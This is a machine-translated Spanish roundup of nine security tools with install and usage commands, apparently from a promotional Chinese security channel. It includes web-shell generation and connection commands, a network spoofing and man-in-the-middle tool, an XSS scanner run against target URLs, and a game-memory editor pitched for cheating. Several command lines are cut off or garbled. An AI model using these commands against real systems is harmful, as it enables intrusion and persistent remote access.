Para obtener más documentos profesionales, visite www.itilzj.com
1. Generador de shell web y herramienta de interfaz de línea de comandos
El generador usa php, asp y jsp para crear el webshell
https://github.com/EatonChips/wsh
git clone https://github.com/EatonChips/wsh.git
wsh 127.0.0.1:8080/test.php --param cmd
wsh generate php --param cmd --no-file -o shell.php
wsh generate php --no-file --header user-agent -o shell.php
wsh 127.0.0.1:8080/shell.php --header user-agent
wsh generate php --no-file --param cmd -w 127.0.0.1,10.0.23.3 -w 12.4.22.3 -o shell.php
wsh generate php --no-file --param cmd --pass S3cr3t --pass-param pass
wsh 127.0.0.1:8080/shell.php --param cmd -P pass:S3cr3t
wsh generate php --no-file --param cmd --pass S3cr3t --pass-header pass-header
8080/shell.php --param cmd -H pass-header:S3cr3t :
wsh g php --param cmd --no-file --base64
wsh g jsp --param cmd --no-file -o index.jsp
jar -cvf shell.war index.jsp
//10.0.0.27/shell.asp --param cmd --prefix powershell.exe :
8080/shell.php --param cmd --log localhost.log :
wsh 127.0.0.1:8080/index.php -X POST --param cmd
8080/index.php -X POST --param cmd --trim-prefix '
' --trim-suffix '
:
'
2. Use PacketSifter para filtrar información valiosa de pcap
Instalar Wireshark y bibliotecas dependientes en entorno Linux
https://tshark.dev/setup/install/
Configuración del entorno Tshark
https://tshark.dev/setup/configuration/
https://github.com/packetsifter/packetsifterTool
//github.com/packetsifter/packetsifterTool.git :
cd packetsifterTool
sh AbuseIPDBInitial.sh
sh VTInitial.sh
sh packetsifter.sh
VirusTotal Integration
install jq
install curl
AbuseIPDB Integration
install jq
install curl
-i /tmp/testing.pcap -a -r -v
3. Marco de prueba de autenticación web
Raider tratará el mecanismo de autenticación como una máquina de estados finitos, cada paso de autenticación es un estado diferente con sus propias entradas y salidas, que pueden ser cookies, encabezados, tokens CSRF u otra información.
https://github.com/DigeeX/raider
pip3 install --user raider
4. Potente generador de diccionario inteligente
Elpscrk es una poderosa herramienta de criptoanálisis de usuario de propósito general que es esencialmente un generador de diccionario inteligente
https://github.com/D4Vinci/elpscrk
git clone https://github.com/D4Vinci/elpscrk.git
pip install -r requirements.txt
或
python3 -m pip install -r requirements.txt
5. Potentes herramientas de análisis de ingeniería inversa
Doldrums es una poderosa herramienta de análisis de ingeniería inversa, principalmente para aplicaciones Flutter del lado de Android.Doldrums es un analizador y extractor de información para el código Android Flutter/Dart (generalmente llamado libapp.so), compatible con todas las versiones de Dart v2.10. En tiempo de ejecución, Doldrums puede exportar todas las clases presentes en la instantánea aislada.
https://github.com/rscloura/Doldrums
pip3 install pyelftools
python3 src/main.py [-v] libapp.so output
6. Suplantación de identidad de datos basada en C# y herramientas MitM
InveighZero es una herramienta todo en uno de suplantación de identidad LLMNR/NBNS/mDNS/DNS/DHCPv6 y ataque man-in-the-middle diseñada para ayudar a los evaluadores de penetración e investigadores del equipo rojo a encontrar fallas de seguridad en sistemas Windows específicos. InveighZero está desarrollado en base a C# y muchas de las funciones de la versión actual son las mismas que las de la versión PowerShell de Inveigh.
https://github.com/Kevin-Robertson/Inveigh
https://github.com/Kevin-Robertson/InveighZero
git clone https://github.com/Kevin-Robertson/InveighZero.git
7. Use Uchihash para manejar hashes incrustados en malware
Uchihash es una poderosa utilidad que ayuda a los investigadores a procesar y analizar varios hashes incrustados en malware para ahorrar el tiempo necesario para el análisis de malware.
Contenido de análisis soportado por Uchihash:
Importar API dinámicamente (especialmente en shellcode)
Detectar procesos en ejecución (procesos de herramientas de análisis, mecanismos anti-análisis)
Detección de máquinas virtuales o herramientas antivirus (mecanismo antianálisis)
https://github.com/N1ght-W0lf/Uchihash
//github.com/N1ght-W0lf/Uchihash.git :
pip install -r requirements.txt
[-h] [--algo ALGO] [--apis] [--keywords] [--list LIST] [--script SCRIPT] [--search SEARCH] [--hashes HASHES] [--ida]
python uchihash.py --algo crc32 --apis
python uchihash.py --algo murmur3 --list mywords.txt
python uchihash.py --search hashmap.txt --hashes myhashes.txt
python uchihash.py --script custom_algo.py --apis
python uchihash.py --search output/hashmap.txt --hashes buer_hashes.txt --ida
8. Use ppmap para detectar y explotar vulnerabilidades XSS
sudo apt-get install chromium
sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
sudo apt-get update
sudo apt-get install google-chrome-stable
go get -u github.com/chromedp/chromedp
https://github.com/kleiton0x00/ppmap
https://github.com/kleiton0x00/ppmap/releases
git clone https://github.com/kleiton0x00/ppmap.git
cd ppmap
go build ppmap.go
escaneo único
echo 'https://target.com' | ./ppmap
echo 'http://target.com/something/?page=home' | ./ppmap
Escaneo por lotes
cat url.txt | ./ppmap
9. Herramienta de búsqueda y reparación de memoria para volver a firmar IPA (la modificación de memoria es la forma más fácil de lograr trampas en el campo del juego)
Ipa-medit es una herramienta de búsqueda y reparación de memoria para IPA re-firmado, que se puede utilizar sin jailbreak, principalmente para el campo de las pruebas de seguridad de juegos móviles.
Mac OS
Primero se debe instalar un certificado de desarrollo de iOS válido
código x
https://github.com/libimobiledevice/libimobiledevice
https://github.com/libimobiledevice/ideviceinstaller
Comandos de instalación para componentes dependientes
brew install --HEAD libplist
brew install --HEAD usbmuxd
brew install --HEAD libimobiledevice
brew install --HEAD ideviceinstaller
go install github.com/aktsk/ipa-medit@latest
https://github.com/aktsk/ipa-medit
git clone [email protected]:aktsk/ipa-medit.git
cd ipa-medit
make build
ipautil decode tap1000000.ipa #unzip
ipautil build Payload #re-sign and generate .ipa file
unzip tap1000000.ipa
ipa-medit -bin="./Payload/tap1000000.app/tap1000000" -id="jp.hoge.tap1000000"
Bienestar
El círculo de comunicación del personal de seguridad del sistema/seguridad de la red/seguridad de la aplicación, para brindarle información de vanguardia/cursos de capacitación/manuales técnicos exclusivos/herramientas de seguridad/etc. plantillas de documentos en el campo de la seguridad de la información de vez en cuando, líderes de la industria comparta e intercambie/intercambie experiencias entre pares, ¡esperamos que se una! Escanee el código para unirse.
A medida que los materiales continúen aumentando, la comunidad aumentará el precio de vez en cuando y se unirá temprano para obtener mejores descuentos.
La cuenta oficial envía las siguientes palabras clave para obtener información gratuita:
1. Conjunto de datos técnicos de seguridad: respuesta "10"
2. Conjunto de informes de seguridad de datos: respuesta "20"
3. Conjunto de informes de seguridad de red: respuesta "30"
4. Manual de evaluación de Igual garantía 2.0 -- respuesta "40"
5.27001 Documento del sistema -- respuesta "50"
Descargo de responsabilidad:
La información compartida en esta cuenta oficial se recopila y recopila de Internet. Los derechos de autor de todos los textos e imágenes pertenecen al autor original y solo representan las opiniones personales del autor. No tiene nada que ver con esta cuenta oficial. El artículo es solo para que los lectores aprendan e intercambien, y verifique lo relevante Si el contenido del artículo implica una infracción, comuníquese con el administrador de fondo para eliminarlo.